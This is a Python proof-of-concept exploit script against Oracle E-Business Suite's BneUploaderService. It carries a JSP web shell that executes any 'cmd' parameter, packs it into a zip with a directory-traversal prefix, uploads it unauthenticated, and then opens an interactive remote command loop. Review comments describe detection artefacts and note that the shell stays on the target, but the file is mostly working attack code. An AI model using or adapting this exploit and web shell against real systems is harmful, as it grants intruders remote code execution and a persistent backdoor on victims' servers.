#!/usr/bin/python3
#POC by HMs
import requests
import os
import sys
# JSP source that Write_Shell() writes to shell.jsp verbatim.
# What the page does when it is served:
#   * reads the "cmd" request parameter;
#   * if present, passes it to Runtime.getRuntime().exec();
#   * echoes the child process's standard output back, one line at a time
#     (stderr is never read, and the OutputStream local is unused).
# The page performs no authentication or authorisation check of its own, so
# access control depends entirely on whatever fronts the path it is served from.
# Detection-relevant artefacts visible in this file: a JSP named shell.jsp
# under the forms application directory (see the --prefix in Write_Shell) and
# HTTP requests to /forms/shell.jsp carrying a "cmd" query parameter.
# This string is runtime data: changing any character changes the uploaded file.
shell = '''
<%@ page import="java.util.*,java.io.*"%>
<%
String cmd = request.getParameter("cmd");
if(cmd != null) {
Process p = Runtime.getRuntime().exec(cmd);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String line = dis.readLine();
while(line != null) {
out.println(line);
line = dis.readLine();
}
}
%>
'''
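def Write_Shell():
    """Build the local artefacts ``shell.jsp``, ``shell.zip`` and ``shell.uue``.

    Writes the module-level ``shell`` JSP source to ``shell.jsp`` in the
    current working directory, then runs two external tools through the
    local shell: ``slipit`` to place that file in ``shell.zip`` and
    ``uuencode`` to encode the archive as ``shell.uue``.

    Raises:
        RuntimeError: if either external command exits with a non-zero
            status. The original ignored both statuses, so a missing tool
            left no usable upload and the caller went on to report
            "not vuln" for a target that was never actually tested.
    """
    with open("shell.jsp", "w") as f:
        # One write() emits the same bytes the original writelines() call did.
        f.write("%s \n" % (shell))

    # The archive entry is not stored under a plain file name: slipit is asked
    # for a five-level parent-directory prefix followed by the forms
    # application path. A receiver that unpacks archives without normalising
    # entry names and rejecting those that leave the extraction root will
    # write the file at that path instead.
    commands = (
        "slipit --overwrite --separator '/' --depth 5 --prefix '/FMW_Home/Oracle_EBS-app1/applications/forms/forms/' shell.zip shell.jsp",
        "uuencode shell.zip shell.zip > shell.uue",
    )
    for command in commands:
        status = os.system(command)
        if status != 0:
            raise RuntimeError(
                "%s failed with status %d" % (command.split()[0], status)
            )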
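def exploit():
    """Upload the uuencoded archive to the target and probe for the dropped JSP.

    Reads the target base URL from ``sys.argv[1]``, builds the artefacts with
    ``Write_Shell()``, POSTs ``shell.uue`` as a multipart field named ``text``
    to ``/OA_HTML/BneUploaderService?bne:uueupload=true`` and then GETs
    ``/forms/shell.jsp``. A 200 response to that GET is treated as success and
    starts an interactive loop that forwards each typed line to the JSP via
    ``curl``; any other status prints "not vuln".

    Changes from the original:
      * ``host.endswith == '/'`` compared a bound method with a string and
        was therefore always False; the base URL is now normalised with
        ``rstrip('/')`` so a trailing slash no longer yields ``//`` paths.
      * a missing command-line argument produces a usage message instead of
        an ``IndexError`` after the artefacts were already written.
      * the upload file handle is closed once the POST has been sent.
    """
    if len(sys.argv) < 2:
        sys.exit("usage: %s <base-url>" % sys.argv[0])

    Write_Shell()

    host = sys.argv[1].rstrip('/')
    url = host + '/OA_HTML/BneUploaderService?bne:uueupload=true'
    url_shell = host + '/forms/shell.jsp'

    upload_name = 'shell.uue'
    with open(upload_name, 'rb') as payload:
        up = {'text': (upload_name, payload, "multipart/mixed")}
        # The upload response is not inspected; only the follow-up GET decides.
        requests.post(url, files=up)

    # NOTE(review): status 200 is the sole success criterion. A server that
    # answers 200 for arbitrary paths (custom error or login pages) would be
    # reported as vulnerable, and any non-200 caused by a proxy, WAF or
    # transient error is reported as "not vuln" — neither result is proof of
    # patch status on its own.
    check = requests.get(url_shell)
    if check.status_code != 200:
        print("\nnot vuln")
        return

    print('\n-----------------------------------\n[+] Exploiting .......\nShell has uploaded!\n-----------------------------------\n')

    # NOTE(review): nothing in this script removes shell.jsp from the target.
    # After a successful run the unauthenticated JSP stays reachable at
    # url_shell until it is deleted on the server.
    while True:
        cmd = input("~shell[~]: ")
        if cmd in ('q', 'quit', 'Q'):
            break
        # NOTE(review): cmd is interpolated unquoted and un-encoded into a
        # command line for the *local* shell, so the operator's own shell
        # parses it (spaces, ';', '&', quotes) before curl is invoked.
        os.system("curl %s?cmd=%s" % (url_shell, cmd))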
# Script entry point: runs only when the file is executed directly, not when
# it is imported. exploit() takes the target base URL from sys.argv[1].
if __name__ == '__main__':
    exploit()